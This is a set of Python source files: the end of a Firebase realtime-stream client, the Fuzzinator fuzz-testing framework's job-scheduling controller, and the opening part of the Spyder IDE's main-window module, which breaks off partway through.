self.resp.raw._fp.fp.raw._sock.close()
class Stream:
def __init__(self, url, stream_handler, build_headers, stream_id):
self.build_headers = build_headers
self.url = url
self.stream_handler = stream_handler
self.stream_id = stream_id
self.sse = None
self.thread = None
self.start()
def make_session(self):
"""
Return a custom session object to be passed to the ClosableSSEClient.
"""
session = KeepAuthSession()
return session
def start(self):
self.thread = threading.Thread(target=self.start_stream)
self.thread.start()
return self
def start_stream(self):
self.sse = ClosableSSEClient(self.url, session=self.make_session(), build_headers=self.build_headers)
for msg in self.sse:
if msg:
msg_data = json.loads(msg.data)
msg_data["event"] = msg.event
if self.stream_id:
msg_data["stream_id"] = self.stream_id
self.stream_handler(msg_data)
def close(self):
        # Wait until the SSE client exists and has an open response to shut down.
        while not self.sse or not hasattr(self.sse, 'resp'):
time.sleep(0.001)
self.sse.running = False
self.sse.close()
self.thread.join()
return self
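# --- Hedged usage sketch (added for illustration; not part of the original
# module). It shows how Database.stream() and the Stream class above fit
# together. `db` is assumed to be a Database instance; the handler just prints
# each message dict, whose "event" and optional "stream_id" keys are set by
# start_stream() above and whose remaining keys ("path", "data") come from
# Firebase's server-sent-event payload.
def _example_stream(db, token=None):
    """Open a realtime stream on a path and close it again (sketch)."""
    def handler(message):
        print(message["event"], message.get("path"), message.get("data"))
    stream = db.child("users").stream(handler, token, stream_id="users-stream")
    # ...later, stop the background thread and shut the connection down:
    stream.close()
    return stream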
|
controller.py
|
# Copyright (c) 2016-2022 Renata Hodovan, Akos Kiss.
#
# Licensed under the BSD 3-Clause License
# <LICENSE.rst or https://opensource.org/licenses/BSD-3-Clause>.
# This file may not be copied, modified, or distributed except
# according to those terms.
import os
import shutil
import time
import traceback
from math import inf
from multiprocessing import Lock, Process, Queue
import psutil
from .config import as_bool, as_int_or_inf, as_path, config_get_fuzzers, config_get_kwargs, config_get_object
from .job import FuzzJob, ReduceJob, UpdateJob, ValidateJob
from .listener import ListenerManager
from .mongo_driver import MongoDriver
class Controller(object):
"""
Fuzzinator's main controller that orchestrates a fuzz session by scheduling
all related activities (e.g., keeps SUTs up-to-date, runs fuzzers and feeds
    test cases to SUTs, or minimizes failure-inducing test cases). All
configuration options of the framework must be encapsulated in a
:class:`configparser.ConfigParser` object.
The following config sections and options are recognized:
- Section ``fuzzinator``: Global settings of the framework.
- Option ``work_dir``: Pattern of work directory for temporary files,
which may contain the substring ``{uid}`` as a placeholder for a
unique string (replaced by the framework). (Optional, default:
``~/.fuzzinator/{uid}``)
- Option ``db_uri``: URI to a MongoDB database to store found issues and
execution statistics. (Optional, default:
``mongodb://localhost/fuzzinator``)
- Option ``db_server_selection_timeout``: Controls how long the database
driver will wait to find an available server (in milliseconds).
(Optional, default: 30000)
- Option ``cost_budget``: (Optional, default: number of cpus)
- Option ``validate_after_update``: Boolean to enable the validation
of valid issues of all SUTs after their update.
(Optional, default: ``False``)
- Sections ``sut.NAME``: Definitions of a SUT named *NAME*
- Option ``call``: Fully qualified name of a callable context manager
class. When an instance of the class is called, it must accept a
``test`` keyword argument representing the input to the SUT and must
return a dictionary object if the input triggered an issue in the SUT,
or a value considered false otherwise (which can be a simple ``None``,
but can also be a ``NonIssue`` in complex cases). The returned issue
dictionary (if any) *should* contain an ``'id'`` field that equals for
issues that are not considered unique. (Mandatory)
See package :mod:`fuzzinator.call` for potential SUT calls.
- Option ``cost``: (Optional, default: 1)
- Option ``validate_call``: Fully qualified name of a callable context
manager class that acts as the SUT's ``call`` option during test case
validation. (Optional, default: the value of option ``call``)
See package :mod:`fuzzinator.call` for potential SUT calls.
- Option ``validate_cost``: (Optional, default: the value of option
``cost``)
- Option ``reduce``: Fully qualified name of a callable class. When an
instance of the class is called, it must accept ``issue``,
``sut_call``, ``on_job_progressed`` keyword arguments representing
an issue to be reduced, and must return a tuple consisting of a
reduced test case for the issue (or ``None`` if the issue's current
test case could not be reduced) and a (potentially empty) list of new
issues that were discovered during test case reduction (if any).
(Optional, no reduction for this SUT if option is missing.)
See package :mod:`fuzzinator.reduce` for potential reducers.
- Option ``reduce_call``: Fully qualified name of a callable context
manager class that acts as the SUT's ``call`` option during test case
reduction. (Optional, default: the value of option ``validate_call``
if defined, otherwise the value of option ``call``)
See package :mod:`fuzzinator.call` for potential SUT calls.
- Option ``reduce_cost``: (Optional, default: the value of option
``cost``)
- Option ``update_condition``: Fully qualified name of a callable class.
When an instance of the class is called, it must return ``True`` if
and only if the SUT should be updated. (Optional, SUT is never updated
automatically if option is missing.)
See package :mod:`fuzzinator.update` for potential update conditions.
- Option ``update``: Fully qualified name of a callable class. When an
instance of the class is called, it should perform the update of the
SUT. (Optional, SUT is never updated if option is missing.)
See package :mod:`fuzzinator.update` for potential updaters.
- Option ``update_cost``: (Optional, default: the value of option
``fuzzinator:cost_budget``)
- Option ``validate_after_update``: Boolean to enable the validation
of the valid issues of the SUT after its update. (Optional, default:
the value of option ``fuzzinator:validate_after_update``)
- Option ``formatter``: Fully qualified name of a callable class. When
an instance of the class is called, it must format the issue
dictionary of the SUT by returning a custom string representation. It
must accept an ``issue`` keyword argument representing an issue to be
formatted. The class must also contain a method named ``summary``,
also accepting an ``issue`` keyword argument, which should return a
summary description (preferably a single line of text). (Optional,
default: :func:`fuzzinator.formatter.JsonFormatter`.)
See package :mod:`fuzzinator.formatter` for further potential
formatters.
- Options ``tui_formatter``, ``wui_formatter``, and ``email_formatter``:
Fully qualified name of a callable class that formats the issue
dictionary of the SUT to display it in the TUI issue viewer, on the
WUI issue page, or to insert it into an e-mail notification.
(Optional, default: the value of option ``formatter``)
See package :mod:`fuzzinator.formatter` for potential formatters.
- Option ``exporter``: Fully qualified name of a callable class. When an
instance of the class is called, it must export the issue dictionary
in a custom SUT-specific format. It must accept an ``issue`` keyword
argument representing the issue to be exported and its result must be
writable to a file, i.e., it must be either a string or a byte array.
The export format does not necessarily have to contain all elements of
the issue dictionary (e.g., it is often useful to only extract the
test input that triggered the issue). (Optional, no custom export for
this SUT if option is missing.)
See package :mod:`fuzzinator.exporter` for potential exporters.
- Option ``tracker``: Fully qualified name of a class that can report
issues to an external issue tracker. (Optional, no reporting to
tracker if option is missing.)
See package :mod:`fuzzinator.tracker` for potential trackers.
- Sections ``fuzz.NAME``: Definitions of a fuzz job named *NAME*
- Option ``sut``: Name of the SUT that describes the subject of
this fuzz job. (Mandatory)
- Option ``fuzzer``: Fully qualified name of a callable context manager
class. When an instance of the class is called, it must accept an
``index`` keyword argument representing a running counter in the fuzz
job and must return a test input (or ``None``, which signals that the
fuzzer is "exhausted" and cannot generate more test cases in this fuzz
job). The semantics of the generated test input is not restricted by
the framework, it is up to the configuration to ensure that the SUT of
the fuzz job can deal with the tests generated by the fuzzer of the
fuzz job. (Mandatory)
See package :mod:`fuzzinator.fuzzer` for potential fuzzers.
- Option ``batch``: Number of times the fuzzer is requested to generate
a new test for the SUT. (Optional, default: 1)
- Option ``instances``: Number of instances of this fuzz job allowed to
run in parallel. (Optional, default: ``inf``)
- Option ``refresh``: Statistics update frequency in terms of executed
test cases. (Optional, default: ``batch`` size)
- Section ``listeners``: Definitions of custom event listeners.
This section is optional.
- Options ``OPT``: Fully qualified name of a class that executes custom
actions for selected events.
See package :mod:`fuzzinator.listener` for potential listeners.
- For classes referenced in options with their fully qualified name,
constructor keyword arguments can be given. These arguments have to be
specified in sections ``(sut|fuzz).NAME.OPT`` with appropriate names.
- All classes can be decorated according to python semantics. The
decorators must be callable classes and have to be specified in options
``OPT.decorate(N)`` with fully qualified name. Multiple decorators can
be applied to a class ``OPT``, their order is specified by an integer
index in parentheses. Keyword arguments to be passed to the decorators
have to be listed in sections ``(sut|fuzz).NAME.OPT.decorate(N)``.
See packages :mod:`fuzzinator.call` and :mod:`fuzzinator.fuzzer` for
potential decorators.
- The constructors of all classes (including decorators) can have a
``work_dir`` keyword argument. If present, its value is not filled in
from the corresponding section but provided by the framework with a
unique path under ``fuzzinator:work_dir``.
"""
def __init__(self, config):
"""
:param ~configparser.ConfigParser config: the configuration options of
the fuzz session.
:ivar ListenerManager listener: a listener manager object that is called
on various events during the fuzz session.
"""
self.config = config
work_dir = self.config.get('fuzzinator', 'work_dir').format(uid=os.getpid())
self.config.set('fuzzinator', 'work_dir', work_dir.replace('$', '$$'))
self.work_dir = as_path(work_dir)
self.fuzzers = config_get_fuzzers(self.config)
self.capacity = int(self.config.get('fuzzinator', 'cost_budget'))
self.validate_after_update = as_bool(self.config.get('fuzzinator', 'validate_after_update'))
self.db = MongoDriver(self.config.get('fuzzinator', 'db_uri'),
int(self.config.get('fuzzinator', 'db_server_selection_timeout')))
self.db.init_db(self.fuzzers)
self.session_start = time.time()
self.session_baseline = self.db.get_stats()
self.listener = ListenerManager()
for name in config_get_kwargs(self.config, 'listeners'):
self.listener += config_get_object(self.config, 'listeners', name, init_kwargs=dict(config=config))
self._shared_queue = Queue()
self._shared_lock = Lock()
def run(self, *, max_cycles=None, validate=None, reduce=None):
"""
Start the fuzz session.
:param int max_cycles: maximum number to iterate through the fuzz jobs
defined in the configuration (defaults to ``inf``).
:param str validate: name of SUT to validate issues of at the start of
the fuzz session (the empty string denotes all SUTs; defaults to no
SUT).
:param str reduce: name of SUT to reduce issues of at the start of the
fuzz session (the empty string denotes all SUTs; defaults to no
SUT).
"""
max_cycles = max_cycles if max_cycles is not None else inf
cycle = 0
fuzz_idx = 0
fuzz_names = list(self.fuzzers)
load = 0
job_id = 0
job_queue = []
running_jobs = {}
def _update_load():
current_load = 0
for job_id in list(running_jobs):
if not running_jobs[job_id]['proc'].is_alive() or not psutil.pid_exists(running_jobs[job_id]['proc'].pid):
self.listener.on_job_removed(job_id=job_id)
del running_jobs[job_id]
else:
current_load += running_jobs[job_id]['job'].cost
nonlocal load
if load != current_load:
load = current_load
self.listener.on_load_updated(load=load)
def _poll_jobs():
with self._shared_lock:
while not self._shared_queue.empty():
job_class, job_kwargs, priority = self._shared_queue.get_nowait()
if job_class is not None:
_add_job(job_class, job_kwargs, priority)
else:
_cancel_job(**job_kwargs)
def _add_job(job_class, job_kwargs, priority):
nonlocal job_id
next_job = job_class(id=job_id,
config=self.config,
db=self.db,
listener=self.listener,
**job_kwargs)
job_id += 1
if priority:
next_job.cost = 0
{
FuzzJob:
lambda: self.listener.on_fuzz_job_added(job_id=next_job.id,
cost=next_job.cost,
sut=next_job.sut_name,
fuzzer=next_job.fuzzer_name,
batch=next_job.batch),
ValidateJob:
lambda: self.listener.on_validate_job_added(job_id=next_job.id,
cost=next_job.cost,
sut=next_job.sut_name,
issue_oid=next_job.issue['_id'],
issue_id=next_job.issue['id']),
ReduceJob:
lambda: self.listener.on_reduce_job_added(job_id=next_job.id,
cost=next_job.cost,
sut=next_job.sut_name,
issue_oid=next_job.issue['_id'],
issue_id=next_job.issue['id'],
size=len(str(next_job.issue['test']))),
UpdateJob:
lambda: self.listener.on_update_job_added(job_id=next_job.id,
cost=next_job.cost,
sut=next_job.sut_name),
}[job_class]()
job_queue.insert(0 if priority else len(job_queue), next_job)
def _cancel_job(job_id):
if job_id in running_jobs:
Controller.kill_process_tree(running_jobs[job_id]['proc'].pid)
else:
job_idx = [job_idx for job_idx, job in enumerate(job_queue) if job.id == job_id]
if job_idx:
self.listener.on_job_removed(job_id=job_id)
del job_queue[job_idx[0]]
if validate is not None:
self.validate_all(sut_name=validate)
if reduce is not None:
self.reduce_all(sut_name=reduce)
try:
while True:
# Update load and poll added jobs (if any).
_poll_jobs()
_update_load()
if fuzz_idx == 0:
cycle += 1
if cycle > max_cycles or (not self.fuzzers and max_cycles != inf):
while load > 0:
time.sleep(1)
_poll_jobs() # only to let running jobs cancelled; newly added jobs don't get scheduled
_update_load()
break
# Hunt for new issues only if there is no other work to do.
if not job_queue:
if not self.fuzzers:
time.sleep(1)
continue
# Determine fuzz job to be queued and then update fuzz_idx
# to point to the next job's parameters.
fuzzer_name = fuzz_names[fuzz_idx]
fuzz_section = 'fuzz.' + fuzzer_name
fuzz_idx = (fuzz_idx + 1) % len(self.fuzzers)
# Skip fuzz job if limit on parallel instances is reached.
instances = as_int_or_inf(self.config.get(fuzz_section, 'instances', fallback='inf'))
if instances <= sum(1 for job in running_jobs.values() if isinstance(job['job'], FuzzJob) and job['job'].fuzzer_name == fuzzer_name):
continue
# Before queueing a new fuzz job, check if we are working
# with the latest version of the SUT and queue an update if
# needed.
sut_name = self.config.get(fuzz_section, 'sut')
update_condition = config_get_object(self.config, 'sut.' + sut_name, 'update_condition')
if update_condition and update_condition():
self.add_update_job(sut_name)
self.add_fuzz_job(fuzzer_name)
# Poll newly added job(s). Looping ensures that jobs will
# eventually arrive.
# (Unfortunately, multiprocessing.Queue.empty() is unreliable.)
while not job_queue:
_poll_jobs()
# Perform next job as soon as there is enough capacity for it.
while True:
if not job_queue:
next_job = None
break
if load + job_queue[0].cost <= self.capacity:
next_job = job_queue.pop(0)
break
time.sleep(1)
_poll_jobs()
_update_load()
if not next_job:
continue
proc = Process(target=self._run_job, args=(next_job,))
running_jobs[next_job.id] = dict(job=next_job, proc=proc)
self.listener.on_job_activated(job_id=next_job.id)
proc.start()
except KeyboardInterrupt:
pass
except Exception as e:
self.listener.warning(job_id=None, msg='Exception in the main controller loop: {exception}\n{trace}'.format(exception=e, trace=traceback.format_exc()))
finally:
Controller.kill_process_tree(os.getpid(), kill_root=False)
if os.path.exists(self.work_dir):
shutil.rmtree(self.work_dir, ignore_errors=True)
def _run_job(self, job):
try:
for issue in job.run():
# Automatic reduction and/or validation if the job found something new
if not self.add_reduce_job(issue=issue):
self.add_validate_job(issue=issue)
except Exception as e:
self.listener.warning(job_id=job.id, msg='Exception in {job}: {exception}\n{trace}'.format(
job=repr(job),
exception=e,
trace=traceback.format_exc()))
def add_fuzz_job(self, fuzzer_name, priority=False):
# Added for the sake of completeness and consistency.
# Should not be used by UI to add fuzz jobs.
with self._shared_lock:
self._shared_queue.put((FuzzJob, dict(fuzzer_name=fuzzer_name, subconfig_id=self.fuzzers[fuzzer_name]['subconfig']), priority))
return True
def add_validate_job(self, issue, priority=False):
if not self.config.has_section('sut.' + issue['sut']):
return False
with self._shared_lock:
self._shared_queue.put((ValidateJob, dict(issue=issue), priority))
return True
def add_reduce_job(self, issue, priority=False):
if not self.config.has_option('sut.' + issue['sut'], 'reduce'):
return False
with self._shared_lock:
self._shared_queue.put((ReduceJob, dict(issue=issue), priority))
return True
def add_update_job(self, sut_name, priority=False):
if not self.config.has_option('sut.' + sut_name, 'update'):
return False
with self._shared_lock:
self._shared_queue.put((UpdateJob, dict(sut_name=sut_name), priority))
if as_bool(self.config.get('sut.' + sut_name, 'validate_after_update', fallback=self.validate_after_update)):
self.validate_all(sut_name)
return True
def validate_all(self, sut_name=None):
sut_name = [sut_name] if sut_name else [section.split('.', maxsplit=1)[1] for section in self.config.sections() if section.startswith('sut.') and section.count('.') == 1]
for issue in self.db.find_issues_by_suts(sut_name):
if not issue.get('invalid'):
self.add_validate_job(issue)
def reduce_all(self, sut_name=None):
sut_name = [sut_name] if sut_name else [section.split('.', maxsplit=1)[1] for section in self.config.sections() if section.startswith('sut.') and section.count('.') == 1]
for issue in self.db.find_issues_by_suts(sut_name):
if not issue.get('reported') and not issue.get('reduced') and not issue.get('invalid'):
self.add_reduce_job(issue)
def cancel_job(self, job_id):
with self._shared_lock:
self._shared_queue.put((None, dict(job_id=job_id), None))
return True
@staticmethod
def kill_process_tree(pid, kill_root=True):
try:
root_proc = psutil.Process(pid)
children = root_proc.children(recursive=True)
if kill_root:
children.append(root_proc)
for proc in children:
try:
proc.terminate()
except psutil.Error:
pass
_, alive = psutil.wait_procs(children, timeout=1)
for proc in alive:
try:
proc.kill()
except psutil.Error:
pass
except psutil.NoSuchProcess:
pass
|
mainwindow.py
|
# -*- coding: utf-8 -*-
#
# Copyright © Spyder Project Contributors
# Licensed under the terms of the MIT License
# (see spyder/__init__.py for details)
"""
Spyder, the Scientific Python Development Environment
=====================================================
Developed and maintained by the Spyder Project
Contributors
Copyright © Spyder Project Contributors
Licensed under the terms of the MIT License
(see spyder/__init__.py for details)
"""
# =============================================================================
# Stdlib imports
# =============================================================================
from __future__ import print_function
from collections import OrderedDict
from enum import Enum
import errno
import gc
import logging
import os
import os.path as osp
import shutil
import signal
import socket
import glob
import sys
import threading
import traceback
#==============================================================================
# Check requirements before proceeding
#==============================================================================
from spyder import requirements
requirements.check_path()
requirements.check_qt()
requirements.check_spyder_kernels()
#==============================================================================
# Third-party imports
#==============================================================================
from qtpy.compat import from_qvariant
from qtpy.QtCore import (QCoreApplication, Qt, QTimer, Signal, Slot,
qInstallMessageHandler)
from qtpy.QtGui import QColor, QIcon, QKeySequence
from qtpy.QtWidgets import (QAction, QApplication, QMainWindow, QMenu,
QMessageBox, QShortcut, QStyleFactory, QCheckBox)
# Avoid a "Cannot mix incompatible Qt library" error on Windows platforms
from qtpy import QtSvg # analysis:ignore
# Avoid a bug in Qt: https://bugreports.qt.io/browse/QTBUG-46720
from qtpy import QtWebEngineWidgets # analysis:ignore
from qtawesome.iconic_font import FontError
#==============================================================================
# Local imports
# NOTE: Move (if possible) imports of widgets and plugins exactly where they
# are needed in MainWindow to speed up perceived startup time (i.e. the time
# from clicking the Spyder icon to showing the splash screen).
#==============================================================================
from spyder import __version__
from spyder import dependencies
from spyder.app import tour
from spyder.app.utils import (create_splash_screen, delete_lsp_log_files,
qt_message_handler, set_links_color,
setup_logging, set_opengl_implementation, Spy)
from spyder.config.base import (_, DEV, get_conf_path, get_debug_level,
get_home_dir, get_module_source_path,
get_safe_mode, is_pynsist, running_in_mac_app,
running_under_pytest, STDERR)
from spyder.utils.image_path_manager import get_image_path
from spyder.config.gui import is_dark_font_color
from spyder.config.main import OPEN_FILES_PORT
from spyder.config.manager import CONF
from spyder.config.utils import IMPORT_EXT, is_gtk_desktop
from spyder.otherplugins import get_spyderplugins_mods
from spyder.py3compat import configparser as cp, PY3, to_text_string
from spyder.utils import encoding, programs
from spyder.utils.icon_manager import ima
from spyder.utils.misc import (select_port, getcwd_or_home,
get_python_executable)
from spyder.utils.palette import QStylePalette
from spyder.utils.qthelpers import (create_action, add_actions, file_uri,
qapplication, start_file)
from spyder.utils.stylesheet import APP_STYLESHEET
from spyder.app.solver import (
find_external_plugins, find_internal_plugins, solve_plugin_dependencies)
# Spyder API Imports
from spyder.api.exceptions import SpyderAPIError
from spyder.api.plugins import Plugins, SpyderPluginV2, SpyderDockablePlugin
#==============================================================================
# Windows only local imports
#==============================================================================
set_attached_console_visible = None
is_attached_console_visible = None
set_windows_appusermodelid = None
if os.name == 'nt':
from spyder.utils.windows import (set_attached_console_visible,
set_windows_appusermodelid)
#==============================================================================
# Constants
#==============================================================================
# Module logger
logger = logging.getLogger(__name__)
# Keeping a reference to the original sys.exit before patching it
ORIGINAL_SYS_EXIT = sys.exit
# Get the cwd before initializing WorkingDirectory, which sets it to the one
# used in the last session
CWD = getcwd_or_home()
# Set the index for the default tour
DEFAULT_TOUR = 0
#==============================================================================
# Install Qt message handler
#==============================================================================
qInstallMessageHandler(qt_message_handler)
#==============================================================================
# Main Window
#==============================================================================
class MainWindow(QMainWindow):
"""Spyder main window"""
DOCKOPTIONS = (
QMainWindow.AllowTabbedDocks | QMainWindow.AllowNestedDocks |
QMainWindow.AnimatedDocks
)
SPYDER_PATH = get_conf_path('path')
SPYDER_NOT_ACTIVE_PATH = get_conf_path('not_active_path')
DEFAULT_LAYOUTS = 4
# Signals
restore_scrollbar_position = Signal()
sig_setup_finished = Signal()
all_actions_defined = Signal()
# type: (OrderedDict, OrderedDict)
sig_pythonpath_changed = Signal(object, object)
sig_main_interpreter_changed = Signal()
sig_open_external_file = Signal(str)
sig_resized = Signal("QResizeEvent") # Related to interactive tour
sig_moved = Signal("QMoveEvent") # Related to interactive tour
sig_layout_setup_ready = Signal(object) # Related to default layouts
# --- Plugin handling methods
# ------------------------------------------------------------------------
def get_plugin(self, plugin_name, error=True):
"""
        Return a plugin instance by providing the plugin name.
"""
for name, plugin in self._PLUGINS.items():
if plugin_name == name:
return plugin
else:
if error:
raise SpyderAPIError(
'Plugin "{}" not found!'.format(plugin_name))
else:
return None
def show_status_message(self, message, timeout):
"""
Show a status message in Spyder Main Window.
"""
status_bar = self.statusBar()
if status_bar.isVisible():
status_bar.showMessage(message, timeout)
def show_plugin_compatibility_message(self, message):
"""
Show a compatibility message.
"""
messageBox = QMessageBox(self)
messageBox.setWindowModality(Qt.NonModal)
messageBox.setAttribute(Qt.WA_DeleteOnClose)
messageBox.setWindowTitle(_('Compatibility Check'))
messageBox.setText(message)
messageBox.setStandardButtons(QMessageBox.Ok)
messageBox.show()
def add_plugin(self, plugin, external=False):
"""
Add plugin to plugins dictionary.
"""
self._PLUGINS[plugin.NAME] = plugin
if external:
self._EXTERNAL_PLUGINS[plugin.NAME] = plugin
else:
self._INTERNAL_PLUGINS[plugin.NAME] = plugin
def register_plugin(self, plugin, external=False, omit_conf=False):
"""
Register a plugin in Spyder Main Window.
"""
self.set_splash(_("Loading {}...").format(plugin.get_name()))
logger.info("Loading {}...".format(plugin.NAME))
# Check plugin compatibility
is_compatible, message = plugin.check_compatibility()
plugin.is_compatible = is_compatible
plugin.get_description()
if not is_compatible:
            self.show_plugin_compatibility_message(message)
return
# Signals
plugin.sig_exception_occurred.connect(self.handle_exception)
plugin.sig_free_memory_requested.connect(self.free_memory)
plugin.sig_quit_requested.connect(self.close)
plugin.sig_restart_requested.connect(self.restart)
plugin.sig_redirect_stdio_requested.connect(
self.redirect_internalshell_stdio)
plugin.sig_status_message_requested.connect(self.show_status_message)
if isinstance(plugin, SpyderDockablePlugin):
plugin.sig_focus_changed.connect(self.plugin_focus_changed)
plugin.sig_switch_to_plugin_requested.connect(
self.switch_to_plugin)
plugin.sig_update_ancestor_requested.connect(
lambda: plugin.set_ancestor(self))
# Register plugin
plugin._register(omit_conf=omit_conf)
plugin.register()
if isinstance(plugin, SpyderDockablePlugin):
# Add dockwidget
self.add_dockwidget(plugin)
# Update margins
margin = 0
if CONF.get('main', 'use_custom_margin'):
margin = CONF.get('main', 'custom_margin')
plugin.update_margins(margin)
self.add_plugin(plugin, external=external)
logger.info("Registering shortcuts for {}...".format(plugin.NAME))
for action_name, action in plugin.get_actions().items():
context = (getattr(action, 'shortcut_context', plugin.NAME)
or plugin.NAME)
if getattr(action, 'register_shortcut', True):
if isinstance(action_name, Enum):
action_name = action_name.value
self.register_shortcut(action, context, action_name)
if isinstance(plugin, SpyderDockablePlugin):
try:
context = '_'
name = 'switch to {}'.format(plugin.CONF_SECTION)
shortcut = CONF.get_shortcut(context, name,
plugin_name=plugin.CONF_SECTION)
except (cp.NoSectionError, cp.NoOptionError):
shortcut = None
sc = QShortcut(QKeySequence(), self,
lambda: self.switch_to_plugin(plugin))
sc.setContext(Qt.ApplicationShortcut)
plugin._shortcut = sc
self.register_shortcut(sc, context, name)
self.register_shortcut(plugin.toggle_view_action, context, name)
def unregister_plugin(self, plugin):
"""
Unregister a plugin from the Spyder Main Window.
"""
logger.info("Unloading {}...".format(plugin.NAME))
# Disconnect all slots
signals = [
plugin.sig_quit_requested,
plugin.sig_redirect_stdio_requested,
plugin.sig_status_message_requested,
]
for sig in signals:
try:
sig.disconnect()
except TypeError:
pass
# Unregister shortcuts for actions
logger.info("Unregistering shortcuts for {}...".format(plugin.NAME))
for action_name, action in plugin.get_actions().items():
context = (getattr(action, 'shortcut_context', plugin.NAME)
or plugin.NAME)
self.shortcuts.unregister_shortcut(action, context, action_name)
# Unregister switch to shortcut
shortcut = None
try:
context = '_'
name = 'switch to {}'.format(plugin.CONF_SECTION)
shortcut = CONF.get_shortcut(context, name,
plugin_name=plugin.CONF_SECTION)
except Exception:
pass
if shortcut is not None:
self.shortcuts.unregister_shortcut(
plugin._shortcut,
context,
"Switch to {}".format(plugin.CONF_SECTION),
)
# Remove dockwidget
logger.info("Removing {} dockwidget...".format(plugin.NAME))
self.remove_dockwidget(plugin)
plugin.unregister()
plugin._unregister()
def create_plugin_conf_widget(self, plugin):
"""
Create configuration dialog box page widget.
"""
config_dialog = self.prefs_dialog_instance
if plugin.CONF_WIDGET_CLASS is not None and config_dialog is not None:
conf_widget = plugin.CONF_WIDGET_CLASS(plugin, config_dialog)
conf_widget.initialize()
return conf_widget
@property
def last_plugin(self):
"""
Get last plugin with focus if it is a dockable widget.
If a non-dockable plugin has the focus this will return by default
the Editor plugin.
"""
# Needed to prevent errors with the old API at
# spyder/plugins/base::_switch_to_plugin
return self.layouts.get_last_plugin()
def maximize_dockwidget(self, restore=False):
"""
This is needed to prevent errors with the old API at
spyder/plugins/base::_switch_to_plugin.
See spyder-ide/spyder#15164
Parameters
----------
restore : bool, optional
If the current dockwidget needs to be restored to its unmaximized
state. The default is False.
"""
self.layouts.maximize_dockwidget(restore=restore)
def switch_to_plugin(self, plugin, force_focus=None):
"""
Switch to this plugin.
Notes
-----
This operation unmaximizes the current plugin (if any), raises
this plugin to view (if it's hidden) and gives it focus (if
possible).
"""
last_plugin = self.last_plugin
try:
# New API
if (last_plugin is not None
and last_plugin.get_widget().is_maximized
and last_plugin is not plugin):
self.layouts.maximize_dockwidget()
except AttributeError:
# Old API
if (last_plugin is not None and self.last_plugin._ismaximized
and last_plugin is not plugin):
self.layouts.maximize_dockwidget()
try:
# New API
if not plugin.toggle_view_action.isChecked():
plugin.toggle_view_action.setChecked(True)
plugin.get_widget().is_visible = False
except AttributeError:
# Old API
if not plugin._toggle_view_action.isChecked():
plugin._toggle_view_action.setChecked(True)
plugin._widget._is_visible = False
plugin.change_visibility(True, force_focus=force_focus)
def remove_dockwidget(self, plugin):
"""
Remove a plugin QDockWidget from the main window.
"""
self.removeDockWidget(plugin.dockwidget)
try:
self.widgetlist.remove(plugin)
except ValueError:
pass
def tabify_plugins(self, first, second):
"""Tabify plugin dockwigdets."""
self.tabifyDockWidget(first.dockwidget, second.dockwidget)
def tabify_plugin(self, plugin, default=None):
"""
Tabify the plugin using the list of possible TABIFY options.
Only do this if the dockwidget does not have more dockwidgets
in the same position and if the plugin is using the New API.
"""
def tabify_helper(plugin, next_to_plugins):
for next_to_plugin in next_to_plugins:
try:
self.tabify_plugins(next_to_plugin, plugin)
break
except SpyderAPIError as err:
logger.error(err)
        # If TABIFY is not defined, fall back to [default]
tabify = getattr(plugin, 'TABIFY', [default])
if not isinstance(tabify, list):
next_to_plugins = [tabify]
else:
next_to_plugins = tabify
        # Bail out if TABIFY is empty or only contains None, i.e. there is
        # nothing to tabify with
if tabify in [[None], []]:
return False
# Get the actual plugins from the names
next_to_plugins = [self.get_plugin(p) for p in next_to_plugins]
# First time plugin starts
if plugin.get_conf('first_time', True):
if (isinstance(plugin, SpyderDockablePlugin)
and plugin.NAME != Plugins.Console):
logger.info(
"Tabify {} dockwidget for the first time...".format(
plugin.NAME))
tabify_helper(plugin, next_to_plugins)
plugin.set_conf('enable', True)
plugin.set_conf('first_time', False)
else:
# This is needed to ensure new plugins are placed correctly
# without the need for a layout reset.
logger.info("Tabify {} dockwidget...".format(plugin.NAME))
# Check if plugin has no other dockwidgets in the same position
if not bool(self.tabifiedDockWidgets(plugin.dockwidget)):
tabify_helper(plugin, next_to_plugins)
return True
def handle_exception(self, error_data):
"""
        This method calls the exception handler of the Console plugin. It is
        provided as a signal on the Plugin API for convenience, so that
        plugins do not need to call the Console plugin explicitly.
Parameters
----------
error_data: dict
The dictionary containing error data. The expected keys are:
>>> error_data= {
"text": str,
"is_traceback": bool,
"repo": str,
"title": str,
"label": str,
"steps": str,
}
Notes
-----
The `is_traceback` key indicates if `text` contains plain text or a
Python error traceback.
The `title` and `repo` keys indicate how the error data should
customize the report dialog and Github error submission.
The `label` and `steps` keys allow customizing the content of the
error dialog.
"""
if self.console:
self.console.handle_exception(error_data)
def __init__(self, splash=None, options=None):
QMainWindow.__init__(self)
qapp = QApplication.instance()
if running_under_pytest():
self._proxy_style = None
else:
from spyder.utils.qthelpers import SpyderProxyStyle
# None is needed, see: https://bugreports.qt.io/browse/PYSIDE-922
self._proxy_style = SpyderProxyStyle(None)
# Enabling scaling for high dpi
qapp.setAttribute(Qt.AA_UseHighDpiPixmaps)
self.default_style = str(qapp.style().objectName())
self.init_workdir = options.working_directory
self.profile = options.profile
self.multithreaded = options.multithreaded
self.new_instance = options.new_instance
if options.project is not None and not running_in_mac_app():
self.open_project = osp.normpath(osp.join(CWD, options.project))
else:
self.open_project = None
self.window_title = options.window_title
logger.info("Start of MainWindow constructor")
def signal_handler(signum, frame=None):
"""Handler for signals."""
sys.stdout.write('Handling signal: %s\n' % signum)
sys.stdout.flush()
QApplication.quit()
if os.name == "nt":
try:
import win32api
win32api.SetConsoleCtrlHandler(signal_handler, True)
except ImportError:
pass
else:
signal.signal(signal.SIGTERM, signal_handler)
if not DEV:
                # Make Spyder quit when pressing Ctrl+C in the console
# In DEV Ctrl+C doesn't quit, because it helps to
# capture the traceback when spyder freezes
signal.signal(signal.SIGINT, signal_handler)
# Use a custom Qt stylesheet
if sys.platform == 'darwin':
spy_path = get_module_source_path('spyder')
img_path = osp.join(spy_path, 'images')
mac_style = open(osp.join(spy_path, 'app', 'mac_stylesheet.qss')).read()
mac_style = mac_style.replace('$IMAGE_PATH', img_path)
self.setStyleSheet(mac_style)
# Shortcut management data
self.shortcut_data = []
# Handle Spyder path
self.path = ()
self.not_active_path = ()
self.project_path = ()
# New API
self._APPLICATION_TOOLBARS = OrderedDict()
self._STATUS_WIDGETS = OrderedDict()
self._PLUGINS = OrderedDict()
self._EXTERNAL_PLUGINS = OrderedDict()
self._INTERNAL_PLUGINS = OrderedDict()
        # Mapping of new plugin identifiers to the old attribute names given
        # to plugins, also used to prevent collisions with other attributes,
